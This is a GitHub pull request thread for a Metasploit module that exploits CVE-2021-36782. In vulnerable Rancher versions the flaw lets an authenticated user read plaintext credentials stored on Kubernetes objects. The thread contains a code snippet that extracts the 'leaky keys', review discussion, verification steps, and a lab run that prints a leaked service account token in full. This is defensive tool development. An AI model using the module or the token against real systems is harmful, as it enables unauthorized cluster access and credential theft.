Rancher Authenticated API Credential Exposure (CVE-2021-36782) #18956
Conversation
documentation/modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.md
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb
Outdated
Show resolved
Hide resolved
| ].each do |leaky_key| | ||
| leaky_key_fixed = leaky_key.split('.')[1..] # remove first item, | ||
| leaky_key_fixed = leaky_key_fixed.map { |item| item[0].downcase + item[1..] } # downcase first letter in each word | ||
| print_good("Found leaked key #{leaky_key}: #{data.dig(*leaky_key_fixed)}") if data.dig(*leaky_key_fixed) |
There was a problem hiding this comment.
Should we store these credentials?
There was a problem hiding this comment.
I wasn't able to configure some/most of them, so matching up all the needed information from all the places (username to go with the password, plus the rhost/service) would be difficult at best. I've left it like this to avoid having to do all that extra guess work
|
@fe-ax for your awareness |
|
Nice work @h00die. I've bootstrapped the old version using the digital ocean terraform files, and your module works beautifully. My run |
|
@fe-ax If someone wanted to set this up in a Docker env instead of DO, do you have any tips? Looks like you need 2 rancher instances and put them into a cluster, that about it? Also, thanks for the run and proof of it working! |
If you set up Rancher as a standalone development version and import a single node K3s cluster you can shrink the setup down. Not 100% sure though. The DO variant is just to resemble a production environment. |
There was a problem hiding this comment.
Thanks @h00die ! I just left a few minor comments, otherwise it looks good to me. I'll assign this PR to @smcintyre-r7 to test, since I believe he has a DigitalOcean account he can use.
modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.rb
Outdated
Show resolved
Hide resolved
|
I put in a personal access token with all read privileges. Rancher accepted it but the module is not recovering it. |
|
I don't believe a personal access token is one of the vulnerable data types that are recoverable |
It's only recovering the kontainer-engine's service account token, which has all privileges. I have written about it on my blog https://fe.ax/cve-2021-36782/ for more information. |
There was a problem hiding this comment.
Alright, I was able to get this up and running with terraform. I added the steps to the documentation in the install section to aid future travelers. With that setup, I was able to run the module and see that it is working correctly.
Once the unit tests pass, I'll get this landed. Thanks @h00die and @fe-ax.
metasploit-framework (S:0 J:0) auxiliary(gather/rancher_authenticated_api_cred_exposure) > rerun
[*] Reloading module...
[*] Running module against 192.168.159.175
[*] Attempting login
[+] Login successful, querying APIs
[*] Querying /v1/management.cattle.io.catalogs
[*] Querying /v1/management.cattle.io.clusters
[+] Found leaked key Cluster.Status.ServiceAccountToken: eyJhbGclOiJSUzI1NiIsImtpZCI6IlRuRURfcTltdE9taDNTdGI5em82Q3ZLZ3RERVR0aFAwQVp5ckJkSGFNSEEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Liwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tOTZ2dHIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc3VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImY0ZmZjOTBiLTBiMWMtNDc4Ni05ZTFjLTVlMzkwYWU2ZGMwZiIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.LJzmwzVm5ZYg7aIWZVJS7-tgvij4-ZSikzVkFsVecikn5nNBFSS0EexQiNxK19rbTtjnRfebO-OxPgzYLh7U2KOYcv2Qz_6BZrCUxy0nhkkBqF0l91woGEAN0V-g81XQbGdzM6-xdnn6HgqQj1mbquc8oah04e7TOAdNLcxWrMUxspEtbjjDNdnAGEpfZCSq7Z3Rwfkt_gbS_Kmux4vOvgl9lVb561lnS-p_-qLbY2Uyk2Xt750qbKXjUucuXPkTpbIdCQjYUotAWn-Iq_a_5P6v5mlBFZoxHxtWh-Fwyvk-Vetb-ACqfj7PBZZ9xOcMqRPjwdpDJu55L1uqZppQ8Q
[*] Querying /v1/management.cattle.io.clustertemplates
[*] Querying /v1/management.cattle.io.notifiers
[*] Querying /v1/project.cattle.io.sourcecodeproviderconfig
[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/catalogs
[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clusters
[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clustertemplates
[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/notifiers
[*] Querying /k8s/clusters/local/apis/project.cattle.io/v3/sourcecodeproviderconfigs
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(gather/rancher_authenticated_api_cred_exposure) >
Release NotesThis adds an exploit for CVE-2021-36782, a vulnerability which can be leveraged by an authenticated attacker to leak API credentials from an affected Rancher instance. |
smcintyre-r7
added
the
rn-modules
This PR adds a module for an authenticated API credential exposure in Rancher
An issue was discovered in Rancher versions up to and including
2.5.15 and 2.6.6 where sensitive fields, like passwords, API keys
and Ranchers service account token (used to provision clusters),
were stored in plaintext directly on Kubernetes objects like Clusters,
for example cluster.management.cattle.io. Anyone with read access to
those objects in the Kubernetes API could retrieve the plaintext
version of those sensitive data.
While there were a whole bunch of fields that the advisory said were vulnerable, I was only able to figure out how to add the ones from the install instructions. I think adding cloud credentials may be fairly easy, I found it in the UI, but I didn't have any valid ones to test against.
Verification
use auxiliary/gather/rancher_authenticated_api_cred_exposureset rhosts [ip]set username [username]set password [password]run